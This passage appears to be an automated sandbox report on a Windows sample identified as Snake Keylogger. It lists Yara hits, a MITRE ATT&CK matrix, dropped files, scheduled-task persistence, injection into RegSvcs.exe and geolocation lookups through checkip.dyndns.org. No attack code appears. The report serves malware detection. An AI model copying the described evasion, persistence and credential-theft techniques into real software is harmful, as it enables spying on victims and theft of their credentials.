              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeQueries volume information: C:\Users\user\AppData\Roaming\aVmZDnwW.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7620, type: MEMORYSTR
              Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7620, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		1
              Scheduled Task/Job              		11
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              System Network Configuration Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items32
              Software Packing              		DCSync12
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583466 Sample: file.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 55 reallyfreegeoip.org 2->55 57 checkip.dyndns.org 2->57 59 checkip.dyndns.com 2->59 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Sigma detected: Scheduled temp file as task from temp location 2->69 73 8 other signatures 2->73 9 file.exe 7 2->9         started        13 aVmZDnwW.exe 5 2->13         started        signatures3 71 Tries to detect the country of the analysis system (by using the IP) 55->71 process4 file5 47 C:\Users\user\AppData\Roaming\aVmZDnwW.exe, PE32 9->47 dropped 49 C:\Users\...\aVmZDnwW.exe:Zone.Identifier, ASCII 9->49 dropped 51 C:\Users\user\AppData\Local\...\tmp9FE1.tmp, XML 9->51 dropped 53 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 9->53 dropped 75 Detected unpacking (changes PE section rights) 9->75 77 Detected unpacking (overwrites its own PE header) 9->77 79 Uses schtasks.exe or at.exe to add and modify task schedules 9->79 87 3 other signatures 9->87 15 powershell.exe 23 9->15         started        18 RegSvcs.exe 15 4 9->18         started        21 schtasks.exe 1 9->21         started        81 Multi AV Scanner detection for dropped file 13->81 83 Machine Learning detection for dropped file 13->83 85 Writes to foreign memory regions 13->85 23 RegSvcs.exe 13->23         started        25 schtasks.exe 1 13->25         started        signatures6 process7 dnsIp8 89 Loading BitLocker PowerShell Module 15->89 27 WmiPrvSE.exe 15->27         started        29 conhost.exe 15->29         started        61 checkip.dyndns.com 193.122.130.0, 49724, 49729, 49732 ORACLE-BMC-31898US United States 18->61 63 reallyfreegeoip.org 188.114.97.3, 443, 49725, 49728 CLOUDFLARENETUS European Union 18->63 31 cmd.exe 18->31         started        33 conhost.exe 21->33         started        35 cmd.exe 23->35         started        37 conhost.exe 25->37         started        signatures9 process10 process11 39 conhost.exe 31->39         started        41 choice.exe 31->41         started        43 conhost.exe 35->43         started        45 choice.exe 35->45         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe71%ReversingLabsByteCode-MSIL.Trojan.Remcos
              file.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\aVmZDnwW.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\aVmZDnwW.exe71%ReversingLabsByteCode-MSIL.Trojan.Remcos

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              		188.114.97.3
              		truefalse
                		high
                checkip.dyndns.com
                		193.122.130.0
                		truefalse
                  		high
                  checkip.dyndns.org
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://checkip.dyndns.org/false
                      		high
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://checkip.dyndns.orgRegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000327E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://checkip.dyndns.comRegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.2185937260.0000000002D76000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, aVmZDnwW.exe, 00000008.00000002.2229755626.00000000028B9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0file.exe, aVmZDnwW.exe.0.drfalse
                                  		high
                                  http://checkip.dyndns.org/qfile.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, aVmZDnwW.exe, 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, 